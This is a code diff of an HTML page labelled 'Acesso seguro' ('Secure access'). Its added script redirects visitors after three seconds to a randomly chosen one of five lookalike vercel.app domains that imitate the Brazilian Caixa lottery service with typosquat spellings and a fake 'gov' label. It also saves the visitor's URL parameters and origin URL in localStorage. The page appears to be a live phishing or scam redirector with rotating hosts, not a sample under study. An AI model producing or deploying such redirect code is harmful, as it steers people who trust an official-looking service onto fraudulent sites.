--- a/index.html
+++ b/index.html
@@ -71,26 +71,35 @@
     <div class="title">Acesso seguro</div>
     <div class="subtitle">Você está sendo redirecionado…</div>
   </div>
+<script>
+  (function () {
+    const targets = [
+      'https://loteriascaixaonline-gov-jqr2.vercel.app/0/',
+      'https://loteriascaixaonlline-gov.vercel.app/0/',
+      'https://loteriascaixaonlline-gov-vxxz.vercel.app/0/',
+      'https://loteriascaixaonlline-gov-da7p.vercel.app/0/',
+      'https://loteriascaixaonlline-gov-lm19.vercel.app/0/'
+    ];
 
-  <script>
-    (function() {
-      const targets = [
-        'https://loteriascaixaonline-gov-jqr2.vercel.app/0/',
-        'https://loteriascaixaonlline-gov.vercel.app/0/',
-        'https://loteriascaixaonlline-gov-vxxz.vercel.app/0/',
-        'https://loteriascaixaonlline-gov-da7p.vercel.app/0/',
-        'https://loteriascaixaonlline-gov-lm19.vercel.app/0/'
-      ];
+    const params = new URLSearchParams(window.location.search);
+    const hash = window.location.hash || '';
 
-      const params = window.location.search || '';
-      const hash = window.location.hash || '';
+    /* 🔹 Salva TODOS os parâmetros no localStorage */
+    params.forEach((value, key) => {
+      localStorage.setItem(key, value);
+    });
 
-      const final = targets[Math.floor(Math.random() * targets.length)] + params + hash;
+    /* (Opcional) salva a URL completa de origem */
+    localStorage.setItem('origin_url', window.location.href);
 
-      setTimeout(() => {
-        window.location.replace(final);
-      }, 3000);
-    })();
-  </script>
+    const target = targets[Math.floor(Math.random() * targets.length)];
+    const finalUrl = target + (params.toString() ? '?' + params.toString() : '') + hash;
+
+    setTimeout(() => {
+      window.location.replace(finalUrl);
+    }, 3000);
+  })();
+</script>
+
 </body>
 </html>
